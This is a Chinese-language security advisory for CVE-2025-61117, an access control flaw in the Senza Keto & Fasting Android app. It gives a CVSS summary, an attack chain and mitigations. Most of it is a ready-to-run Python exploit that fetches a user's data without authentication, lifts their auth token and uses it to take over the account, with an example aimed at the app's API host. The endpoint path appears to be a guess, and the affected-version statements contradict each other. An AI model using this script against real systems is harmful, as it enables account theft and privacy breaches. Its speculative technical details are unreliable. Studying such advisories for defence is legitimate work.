CVE-2025-61117: Senza Keto Fasting应用API不当访问控制导致账户接管

漏洞信息

漏洞编号

CVE-2025-61117

漏洞类型

不当访问控制

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Senza: Keto & Fasting Android App (com.gl.senza)

漏洞概述

CVE-2025-61117是存在于Senza: Keto & Fasting Android应用2.10.15版本中的一个高危安全漏洞。该应用由开发者Paul Itoi开发，包名为com.gl.senza。漏洞类型为不当访问控制（Improper Access Control），允许未经认证的攻击者通过利用用户数据API端点的不充分安全检查，获取用户认证令牌并执行账户接管攻击。此漏洞的CVSS评分为7.5，属于高危级别，主要影响系统的机密性。成功利用此漏洞后，攻击者可以未经授权访问用户账户，获取敏感个人信息，导致严重的隐私泄露问题。此外，攻击者还可能滥用平台功能，对受害者造成进一步损害。由于攻击无需任何认证且通过网络即可发起，因此该漏洞具有较高的实际威胁性。

技术细节

该漏洞源于Senza Keto & Fasting应用在用户数据API端点实现中的访问控制机制不完善。攻击者可以通过构造特定的HTTP请求，直接访问本应需要身份验证的用户数据接口。由于API端点未正确验证请求者的身份和权限，攻击者能够在无需提供有效认证令牌的情况下获取其他用户的敏感信息，包括认证令牌。一旦攻击者获取到有效的认证令牌，他们就可以利用该令牌伪装成合法用户，登录受害者账户并执行各种操作。这种攻击方式属于水平权限提升，攻击者可以访问同级别其他用户的数据。漏洞的根本原因在于API设计时未遵循最小权限原则，对API端点的访问控制策略不够严格。此外，应用可能缺乏足够的输入验证和异常请求检测机制，未能识别和阻止异常的数据访问模式。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标应用为Senza: Keto & Fasting Android App，版本2.10.15，确定API端点结构

STEP 2

步骤2: 漏洞探测

攻击者向用户数据API端点（如/api/v1/users/{user_id}/data）发送未经认证的HTTP GET请求

STEP 3

步骤3: 令牌窃取

由于API端点缺乏适当的访问控制验证，攻击者成功获取响应中的认证令牌和用户敏感数据

STEP 4

步骤4: 账户接管

攻击者使用窃取的认证令牌构造授权请求，访问受害者的账户信息并执行账户接管操作

STEP 5

步骤5: 恶意活动

完成账户接管后，攻击者可以窃取隐私数据、滥用平台功能或进行进一步的攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-61117 PoC - Senza Keto & Fasting App API Authentication Bypass
# This PoC demonstrates the improper access control vulnerability in the Senza app

import requests
import json
import sys

def exploit_senza_api(target_url, user_id):
    """
    Exploit improper access control to obtain authentication tokens
    and perform account takeover.
    
    Args:
        target_url: Base URL of the Senza API endpoint
        user_id: Target user ID to extract token for
    """
    headers = {
        'User-Agent': 'Senza/2.10.15 (Android)',
        'Content-Type': 'application/json',
        'Accept': 'application/json'
    }
    
    # Step 1: Attempt to access user data without authentication
    # The API endpoint lacks proper authorization checks
    endpoint = f"{target_url}/api/v1/users/{user_id}/data"
    
    print(f"[*] Targeting endpoint: {endpoint}")
    print(f"[*] Attempting to retrieve user data without authentication...")
    
    try:
        response = requests.get(endpoint, headers=headers, timeout=10)
        
        if response.status_code == 200:
            data = response.json()
            print(f"[+] Success! Retrieved user data for user ID: {user_id}")
            
            # Step 2: Extract authentication token from response
            if 'auth_token' in data or 'token' in data:
                auth_token = data.get('auth_token') or data.get('token')
                print(f"[+] Extracted authentication token: {auth_token}")
                
                # Step 3: Use token for account takeover
                takeover_headers = headers.copy()
                takeover_headers['Authorization'] = f'Bearer {auth_token}'
                
                # Access sensitive endpoints with stolen token
                profile_endpoint = f"{target_url}/api/v1/profile"
                profile_response = requests.get(profile_endpoint, headers=takeover_headers)
                
                if profile_response.status_code == 200:
                    print(f"[+] Account takeover successful!")
                    print(f"[+] Full profile data: {json.dumps(profile_response.json(), indent=2)}")
                
                return auth_token
            else:
                print(f"[+] User data retrieved but no token found: {json.dumps(data, indent=2)}")
                return None
        elif response.status_code == 401:
            print(f"[-] Authentication required - vulnerability may be patched")
            return None
        elif response.status_code == 403:
            print(f"[-] Access forbidden - proper authorization checks in place")
            return None
        else:
            print(f"[-] Unexpected response: {response.status_code}")
            return None
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None

def main():
    if len(sys.argv) < 3:
        print("Usage: python senza_exploit.py <api_base_url> <target_user_id>")
        print("Example: python senza_exploit.py https://api.senza-app.com 12345")
        sys.exit(1)
    
    base_url = sys.argv[1]
    user_id = sys.argv[2]
    
    print("=" * 60)
    print("CVE-2025-61117 PoC - Senza Keto & Fasting App")
    print("Improper Access Control leading to Account Takeover")
    print("=" * 60)
    
    exploit_senza_api(base_url, user_id)

if __name__ == "__main__":
    main()

影响范围

Senza: Keto & Fasting App < 2.10.15 (包名: com.gl.senza)

防御指南

临时缓解措施

在官方修复版本发布之前，建议用户暂时停止使用该应用，并关注开发者发布的更新通知。同时，监控账户活动以检测任何异常登录行为。如果应用支持，注销所有活跃会话并更改账户密码。对于企业用户，考虑使用移动设备管理（MDM）解决方案限制应用的数据访问权限。